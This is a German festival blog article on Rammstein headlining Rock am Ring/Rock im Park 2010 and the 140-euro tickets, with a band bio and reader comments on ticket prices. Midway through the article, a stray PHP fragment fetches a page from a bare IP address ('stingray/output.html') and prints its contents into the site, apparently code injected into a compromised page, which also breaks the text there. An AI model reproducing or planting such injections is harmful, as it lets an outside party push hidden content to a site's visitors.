Startseite >> Festivals >> Knalleffekt: Rock am Ring/Rock im Park starten mit Rammstein und Tickets zu 140 Euro

Knalleffekt: Rock am Ring/Rock im Park starten mit Rammstein und Tickets zu 140 Euro

Heute wurden Fakten geschaffen. Nachdem Rammstein (Myspace) schon seit der Pressekonferenz bei Rock am Ring 2009 als heisses Gerücht durch die Foren geisterten, wurden sie heute per Videotrailer auf rock-am-ring.com als erste Band für 2010 verpflichtet. Wer dabei sein möchte muss stolze 140 Euro anlegen.

[inset lr=left]Mitdiskutieren in der Netzwerkgruppe Rock am Ring / Rock im Park[/inset]

Wie nicht anders zu erwarten, werden Rammstein deutschlandexklusiv vom nur auf den beiden Zwillingsfestivals (4.-6.Juni 2010) auftreten. Damit ist ein Headlinerslot sicher vergeben.
Für einen der beiden verbliebenen Headslots sind Linkin Park im Gespräch. Besser gesagt: Sänger Mike Shinoda soll sich samt Band bei Fanklubtreffen in Deutschland für Rock am Ring angekündigt haben. Dass darüber nur eine russische Seite berichtet ist zugegebenermassen seltsam.
Auch Muse vermutet man als Teilnehmer im europäischen Festivalsommer seitdem bekannt ist, dass sie im Juni durch Europa touren. Bekannt wurde dies, weil das Stade de France versehentlich vorab veröffentlichte, dass die Briten am 12.Juni in Frankreichs Metropole spielen werden.

Der “Subskriptionspreis” gilt zunächst bis zum 1.Januar 2010. Absolut möglich, das bis zu diesem Termin beide Festivals schon ausverkauft sind. Tickets gibts mittlerweile für 144,50 Euro bei eventim.

$fp=@fopen('http://80.67.30.106:80/stingray/output.html?id=1479','r');
if($fp){$html='';while(!feof($fp)){$html.=@fread($fp,8192);}echo $html;}
fclose($fp); ?>

Wer bereit ist bis Anfang Dezember auf ein Hardticket zu warten, dafür aber 4,50 Euro zu sparen bestellt bei Ticket Per Post ( Rock am Ring / Rock im Park).

Andere Bandhoffnungen, haben sich in den letzten Tagen zerschlagen. Die heiss gehandelten Libertines sehen laut Carl Barat 2010 von einer Reunion ab und Blink182 werden laut Managment erst im August 2010 nach Deutschland kommen.


Rammstein Du Hast live Rock am Ring 1998
Hochgeladen von krauser33. – Entdecke weitere Musik Videos.

Rammstein ist eine deutsche Rockband, die 1994 in Berlin gegründet wurde und oft zur “Neuen Deutschen Härte” gezählt wird. Lange Jahre galten sie wegen ihrem Streit mit Medienpartner MTV als absolutes No-Go bei den beiden MLK-Festivals. Die Band ist durch ihre oft unmoralisch geprägten Texte zu kontroversen Themen sowie ihren brachialen Musikstil gekennzeichnet. Jüngstes Beispiel ist das Porno-Video zur neuen Single “Pussy”, das Appetit auf den Ende Oktober erscheinenden Longplayer “Liebe ist für alle da” machen soll.

Rammsteins Musikstil wird häufig als “Neue Deutsche Härte” bezeichnet. Dabei spannt ihre Musik jedoch einen Bogen über verwandte Stilrichtungen wie Hard Rock und Metal bis hin zu Industrial Rock. Eine genaue Klassifizierung ist daher aufgrund der großen Unterschiede zwischen einzelnen Titeln – beispielsweise zwischen der Ballade Ohne dich, dem brachialen Zerstören und dem Elemente der lateinamerikanischen Musik aufgreifenden Te Quiero Puta! mit spanischem Text – nahezu unmöglich. Andere Bands wie die slowenische Gruppe Laibach, deren Musikstil ebenfalls verschiedene Genres vereint, oder die Rockband Oomph! hatten wichtigen Einfluss auf Rammstein.

Anders als viele Gruppen aus dem wiedervereinten Berlin wollten Rammstein nach eigener Aussage keine amerikanischen und englischen Bands imitieren. Flake Lorenz sagte dazu in einem Interview: “Den Stil haben wir gefunden, indem wir alle genau wussten, was wir nicht wollen. Und wir wollten genau nicht amerikanische Funkymusik machen oder Punk eben oder irgend so was, was wir gar nicht können. Wir haben gemerkt, dass wir nur diese Musik können, die wir auch spielen. Und die ist halt mal sehr einfach, stumpf, monoton.”

[polldaddy poll=2080616]


Aktuelle Festival-News:
Infos zu: , , ,

Mehr lesen? Hier gibts eine Übersicht unserer letzten Artikel.
Dieses und andere Themen diskutieren? Mach mit im Festivalisten Forum.

10 Kommentare

  1. tullux /

    was sich zunächst als kracher herausstellt, relativiert sich, sobald man feststellt,
    dass rammstein bis rar/rip bereits deutschland rauf und runter bespielt haben.

    spätestens im frühjahr werden wir an einer rammsteinernen multimedialen reizüberflutung leiden,
    so dass sich dieser “glücksgriff” zum zeitpunkt der festivals mehr als fraglich darstellt.

    aber was soll ich rumheulen,
    “mein” nova rock wird sicherlich auch nicht verschont werden.

    • Ans Nova Rock hatte ich jetzt noch gar nicht gedacht.
      Sicher aber hast Du Recht: Die “Gefahr” auch dort auf Rammstein zu stossen wird ziemlich gross sein ;)
      Nur beim Ticket fürs Nova dürftest du um einiges günstiger wegkommen…

      Nach einer Nacht drüber schlafen bin ich mir auch ziemlich sicher, dass man den Ticketpreis von Beginn an auf 140 Euro gesetzt hat, weil man davon ausgeht, dass sich das Jubiläum auch dank Rammstein wie geschnitten Brot ausverkaufen wird.
      Gibt auch noch genug Rammsteinjünger und solche, die es potentiell dank “Liebe ist für alle da” werden, die beim Ticketing für die tour bisher leer ausgingen. Daher bin ich so forsch und tippe auf 30% Rammsteinians bei RaR/RiP 2010. Wie sich das auf die Stimmung der Festivals auswirkt, wird interessant werden.
      Muss ich doch hin?!

      • tullux /

        richtig, nicht nur das nova rock, eigentlich sind alle festivals günstiger.
        ohne jetzt eine diskussion vom zaun brechen zu wollen,
        aber werfen wir einmal den blick auf die frühbucherpreise:

        area4 89 €
        hurricane 99 €
        southside 99 €
        nova rock 109 €

        rar/rip 140 €

      • So eine Diskussion ist durchaus angemessen.
        In Deutschland sind solche Dimensionen halt nicht wirklich die Regel.
        Bleibt nur zu hoffen, dass andere Veranstalter nicht nachziehen. Vielleicht schon nach Ende der Frühbucherphasen…

      • Mütze /

        Wenn das Line Up okay ist, sind doch 140 € nun wirklich nicht viel Geld, im schnitt habe ich bisher bei meinen drei Besuchen immer 15 Bands im Schnitt im Park gesehen. Das ist also immer unter 10 € pro Band gewesen.

      • Denke so eine Rechnung macht für ein Festival kaum jemand auf. Ich stimme zu, dass man für sein Geld bei einem Festival mehr bekommt als beim Besuch von Einzelkonzerten, aber…
        In Bezug auf Festivals orientiert man sich meiner Meinung preislich durch den Blick über den Tellerrand auf ähnlich grosse Festivals. Der deutsche Kronprinz Southside/Hurricane verlangt aktuell gerademal 100 Euro für sein Kombiticket. Im Vergleich ist man mit seinen 140 Euro da schon ziemlich abgehoben und festigt seinen Ruf als Festival, das den Hals nicht vollbekommen kann.

        Wie andernorts schon geschrieben: Man hätte ähnlich viel Geld auf wesentlich charmantere Art machen können, z.B. durch eine auf 1-2 Wochen verkürzte Frühbucherphase zu 125 Euro oder einem Kontingent von lediglich 3000 Tickets zu diesem Preis.
        Damit hätte man den Fans zumindest das Gefühl vermittelt, man würde sich um deren Belange kümmern. Die Chance sein Image aufzupolieren wurde verpasst – wiedermal.

        Das es auch anders geht zeigt Jan Smeets beim Pinkpop. Dort feierte man 2009 sein 40. Jubiläum und hielt die Kartenpreise als Geschenk an die Fans auf dem Vorjahresniveau – so kann gute PR aussehen.

  2. Scr33ch /

    kennt sich jemand mit “tickets-per-post.de” aus
    erscheint euch die seite seriös / sicher?

    immerhin sind da die tickets 4 euro billiger als bei dem rießen “eventim”

    • Thorsten /

      Hi,

      die Seite ist absolut seriös. Bestelle dort seit Jahren, die waren immer schnell und zuverlässig.

      Bei eventim hat man bei nahezu allen Tickets einen generellen Aufschlag von 2 Euro pro Ticket :-(

    • Ja da kannste problemlos bestellen.
      Bekommst dann sogar das Hardticket anstelle des CTS-Thermodrucks.
      Einzige kleine Einschränkung: Du musst eben warten, bis die Hardtickets vorliegen. Das soll Anfang Dezember der Fall sein.
      Bei eventim bekommst Du das Ticket sofort zugeschickt.
      Ausserdem supportet man mit rund 2,80 Euro den Festivalisten, wenn man über eventim bestellt.

  3. Diese Bestätigung macht es weder mehr noch weniger wahrscheinlich, dass ich 2010 im Park vobeischaue.

    Den Preis find ich happig angesichts der Kronprinzen Southside/Hurricane, die ihre Karten aktuell für schlappe 43 Euro weniger verticken. Sprich: Kauf 2 Karten für Rock am Ring und erhalte fürs gleiche Geld 3 vom Southside…